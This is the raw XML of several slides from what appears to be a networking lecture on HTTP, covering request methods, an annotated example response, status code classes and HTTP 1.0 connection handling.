                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>Creates a tunnel to a given network location</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10008"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDC9AB6A-8C51-4D09-AA71-CA54060296CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="291153" y="1937982"/>
            <a:ext cx="2265528" cy="1028131"/>
            <a:chOff x="291153" y="1937982"/>
            <a:chExt cx="2265528" cy="1028131"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Left Brace 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC02121D-9914-4D7E-9042-7FAF64AF6B8A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2374710" y="1937982"/>
              <a:ext cx="181971" cy="102813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peech Bubble: Rectangle 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D050927D-A3D7-4C78-B3C2-D009D06646BC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="291153" y="1937982"/>
              <a:ext cx="1628633" cy="900752"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 60173"/>
                <a:gd name="adj2" fmla="val 9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99.9% of all HTTP requests</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B83E6895-3632-43EA-ACBD-AF4CF9BBD102}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="291152" y="3027614"/>
            <a:ext cx="2265529" cy="2895514"/>
            <a:chOff x="291152" y="3027614"/>
            <a:chExt cx="2265529" cy="2895514"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Left Brace 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AC1DF1C-4CEC-4393-9951-03EE3C9D6C1E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2374710" y="3027614"/>
              <a:ext cx="181971" cy="2895514"/>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peech Bubble: Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{278495F2-CB8C-42CD-B0B1-165B6FD936EB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="291152" y="3910084"/>
              <a:ext cx="1628633" cy="900752"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 60173"/>
                <a:gd name="adj2" fmla="val 9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Rarely used</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D72D007-E415-4A42-BF42-06358ECDC0BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="291152" y="5814179"/>
            <a:ext cx="2265529" cy="900752"/>
            <a:chOff x="291152" y="5814179"/>
            <a:chExt cx="2265529" cy="900752"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Left Brace 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9246A8B3-291E-41E1-B0A1-211CDB4E4C86}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2374710" y="6014113"/>
              <a:ext cx="181971" cy="461835"/>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F99AB413-7552-4220-A688-678455B6EB48}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="291152" y="5814179"/>
              <a:ext cx="1628633" cy="900752"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 60173"/>
                <a:gd name="adj2" fmla="val -11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for HTTP proxies</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1767421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1C9DFDAF-5BEB-4900-B5EE-67E5B085BB81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3493828" y="2083558"/>
            <a:ext cx="0" cy="4640239"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:prstDash val="sysDot"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent3"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent3"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent3"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BACD054E-657B-4998-AA03-CB9AAF7E231C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP Response Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FB24184-0038-4394-B534-60E0F5CE0BD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3712191" y="2429301"/>
            <a:ext cx="8397922" cy="4239904"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HTTP/1.1 200 OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Content-Type: text/html; charset=UTF-8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Cache-Control: no-cache</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Content-Encoding: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gzip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Content-Length 24824</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Server: Apache 2.4.2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Date: Mon, 12 Feb 2018 22:44:23 GMT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[response data goes down here]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E364D5B5-7563-4F9D-8D72-C13A561D6D8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2383809"/>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Version and status code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36F52C95-E8AC-4188-A9CC-A38FCE89AE6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="2736376"/>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File type of response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C37AEE1-94CB-49E5-B569-6E95DA5FA7AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2" y="3088943"/>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Cache the response?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60DEBC3B-0494-444E-A0BC-06344BEE90F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3" y="3441510"/>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Response is compress?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE4FF9BF-4EEE-4F91-BD56-10DB70285F27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4" y="3794077"/>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Length of response content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45812494-9C39-4B23-AD77-382C00E2875E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5" y="4146644"/>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Info about the web server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CAF1458-FABD-4CAF-904E-A0FCEEF5B727}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4499211"/>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en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBCE0F1D-100E-49E2-96C1-824866552179}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145576" y="2329218"/>
            <a:ext cx="6496334"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DAB14AC-FD10-4EFC-A6AF-CB83B213F857}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145575" y="2673504"/>
            <a:ext cx="817955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18013513-1862-4720-8E43-57001A900DA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145576" y="2980257"/>
            <a:ext cx="6496334"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62A0D402-6E2B-418F-B8FD-6148B88465BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145576" y="3366697"/>
            <a:ext cx="6496334"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DFD32AC3-104D-4952-ABBA-D821B9D30FD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145576" y="3691967"/>
            <a:ext cx="6496334"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11381139-CC8D-435D-89CD-7BCC009F026C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="141027" y="4037071"/>
            <a:ext cx="7638197"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68A1BFC4-7496-4DA3-93D2-A7C9910BE324}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3666699" y="4396462"/>
            <a:ext cx="4117074" cy="43509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DDEC21E8-D380-43BA-A928-C1E4909C69E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3666699" y="5092425"/>
            <a:ext cx="4658435" cy="1228940"/>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786325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1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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xit" presetSubtype="21" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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xit" presetSubtype="21" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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par>
                          <p:cTn id="49" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="50" presetID="16" presetClass="entr" presetSubtype="21"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21" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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par>
                          <p:cTn id="58" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="59" presetID="16" presetClass="entr" presetSubtype="21"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arn(inVertical)">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xit" presetSubtype="21" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="67" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="68" presetID="16" presetClass="entr" presetSubtype="21"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barn(inVertical)">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Response Status Codes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Three-digit response codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1XX – informational</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2XX – success</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>200 OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3XX – redirection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>301 Moved Permanently</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>303 Moved Temporarily</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>304 Not Modified</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4XX – client error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>404 Not Found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>5XX – server error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>505 HTTP Version Not Supported</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Error 404: Spoons Not Found Essential T-Shirt">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{573FFF09-F449-3F35-0DFF-6BFD5C936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5028" y="1872784"/>
            <a:ext cx="4560231" cy="4560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69067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0.9/1.0 Socket Semantics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One request/response per TCP connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Simple to implement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Easy to know when a response has been fully received</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example flow:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="826878" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open TCP socket, connect to remote host (typically on port 80 or 443)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="826878" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Write the HTTP request to the socket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="826878" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Read HTTP response from the socket until it is closed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18861682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Hypertext Transfer Protocol (HTTP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828801" y="2743200"/>
            <a:ext cx="9497484" cy="2672522"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP 0.9/1.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>HTTP 1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
